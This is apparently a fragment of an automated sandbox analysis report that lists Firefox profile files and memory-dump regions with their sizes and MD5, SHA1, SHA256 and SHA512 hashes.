23ea618509bd7fa18d9b3be367a85d97a31ab42be8c3b3c1d7c539ccc115932018058ed8fd5a4e6635432770a50ae3708b421f5250490c86af4bbbf95bc7a87d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\datareporting\glean\db\data.safe.tmp

Filesize
15KB

MD5
37e796a7726cc6accf90ebac1dbd59b5

SHA1
8920ac8891ac4e45b02c259a92816b23fba42a91

SHA256
b9d7a32dc049791e2da3cd283a6cca6f30b953fbfd51d0d8e1281ad9641fc82b

SHA512
97e037fb9016b388e3295c7769858e668d4136b91aef3acc7a2458355c04deff9d4e7a0284e83a51f542860e35932dffae39cac109b8d42c68f7c555ebed4fa6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\datareporting\glean\pending_pings\8b2cf150-3242-4629-b1e8-b8dac5851c98

Filesize
982B

MD5
d15ed3b997178dcaf138a0c602f87386

SHA1
5c28ae48bce8ed307c7c5a2ed2cf345ae8b26fbe

SHA256
f91b1f75c3a25bf6d1fdd88f78ba619159f978079a4a4c6cb95fc5b665dfcd22

SHA512
4cfdc464bd6a37a4f7eb309919d1c51ff3c02189d9322e10c78f90bd35edaf4782919b3aa66793cfd6ebcf50a5f085eb0f311fa76d555c99ec8b91b3de5bc390

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\datareporting\glean\pending_pings\bd88f102-f246-409a-992a-1712c7997450

Filesize
671B

MD5
a71d7a22058dc30642c66ba5b3daff63

SHA1
5f552cb4ff6d473548fa1bc7ba748b5633e19a9d

SHA256
9b151698192a24a46473ac63fcaa72c48a53c0f3a3856fbe481c55c9313aeb45

SHA512
03fd3308126ef8e2b39660a316d0b65852a7002329fe5fb1f5ed26482c012c272948098e57aaedcdaaff05f7779b8814f3437b996d6179452a7f64106ca469eb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\datareporting\glean\pending_pings\f9a50b49-8fb4-40aa-821d-ad47687f2c65

Filesize
26KB

MD5
da2892f1067d59c4bc33a6cd619fcb25

SHA1
75c9abdf535aa38faa2c768cce85365d9a28481a

SHA256
eb66b72ccde51c2e2c0b66e7d0def1af902677c3074e73ced69fb29ddd377299

SHA512
ac8d5867fba7dd62157f4eedcc66bb4107e4397bc33a1fc7042c1c4fe5e1bac0d7139730e095e9d4691f0f4cd483d6bdde23c37ab17d8a741f461910951c0148

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll.lib.tmp

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll.sig.tmp

Filesize
1KB

MD5
36e5ee071a6f2f03c5d3889de80b0f0d

SHA1
cf6e8ddb87660ef1ef84ae36f97548a2351ac604

SHA256
6be809d16e0944386e45cf605eae0cd2cf46f111d1a6fe999fec813d2c378683

SHA512
99b61896659e558a79f0e9be95286ebf01d31d13b71df6db4923406e88b3ba72584ef2b62e073b2f5e06901af2c7d1b92d3d12187fe5b4b29c9dd2678444f34e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\prefs-1.js

Filesize
12KB

MD5
bc36aae7ba3130792d78d8fa5144c0b1

SHA1
8abc33787cb682e1efec0090171767ff2b2c85da

SHA256
447e67e32c5d5eb51421c84f23b12c0cf5a74e1b23926297af2c00ebca2d5344

SHA512
0cd70ecb2c799b73610347281b30e9b0bcf1d30502bf57e7d091cefb0744bbb35506a15c385acb2a42fa18203ec605081d1688088029d7a08b24dcf9962100b0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\prefs.js

Filesize
10KB

MD5
9ad18771b14634ccfecaf50e538b6941

SHA1
c2348d097cc4b013a973c3dd8cbd431c70e2216c

SHA256
dce39e60332659e61149653b61604403a9253e06303e6fefa4eeddca66073fae

SHA512
18a67a713d8cc3d99dabcb7cda52b28db1d2eed4fe8fb7d0107520500533b6387bf740bd497a6bc2f4b9f6118e06fc58d5fbf4e80d21440d6851304c80ec06a3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\prefs.js

Filesize
10KB

MD5
5d97bd351c57c21a7a4b1bca6c4047fd

SHA1
57ce74e26c98dc6caaf1a9497db1eadb507a5a62

SHA256
bdecac99cb76499fed3aad6b069ec09905329b574ee124879817bc8d65e2fd57

SHA512
6a37c5e35743abcdeaea50601d08bd7991866cbd9f23ad391eefe08f31ffd9889fcdd7a25678ffd8ca3da43db2880a0fc4289b4313beda399a746c85d986857a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\prefs.js

Filesize
10KB

MD5
77fec13d0318add1fbaeda684b1a1514

SHA1
353b049773aa0f101875d0763e0db8dd54a65c0a

SHA256
8faa4fbaaa81e20ea10207d8d2ad371af898ecf69a947081cd87968a394a21ee

SHA512
651420153b3931d0b1d88b935189d0a26eb400dbc6350ebfd9819aa51c35fd34bec4ece00850aee34f136be1b6acd0cb5c992db27e47e38b6416c1cecc40a515

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\prefs.js

Filesize
10KB

MD5
9185846eb3e533e8ab27dab827d8e526

SHA1
1f742a671402d68332f8359d957593d6f543d644

SHA256
465be1ccf33051c9a3cd4af295ef02ef6d8d6456022273a8451dd72fea91d2d3

SHA512
afea5c8497047bfc4b79eb8c3d09e06498c5ed8942bda8a16f74e904adf378d80ff987ad1b4f5e0a8f15cdec513301fdc42974664653a126377fcbb6a47673a5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hohja4eo.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
6cf6b96b48897685a459011fedb8aa71

SHA1
8b2597de4d2256049951ae47c08b1410788d66dd

SHA256
b06ded386f53b7e7fa231eaae2b6838e99acc34f452e0df5ccfec6a9d4338df4

SHA512
74a2daf1a7eb7bfe58b18b9dbaaabc3d5c392d9d5cdefadd23684a452d4b6642d360af2caf0b7ff0b024b4f8f656fa96cdc19ad0cd2bf630f85e64b470c661b2

Download Submit
memory/3744-39-0x0000000000170000-0x000000000017E000-memory.dmp

Filesize
56KB

Download
memory/3884-386-0x0000000000D80000-0x0000000000D98000-memory.dmp

Filesize
96KB

Download
memory/4700-5-0x0000023EC95A0000-0x0000023EC95C2000-memory.dmp

Filesize
136KB

Download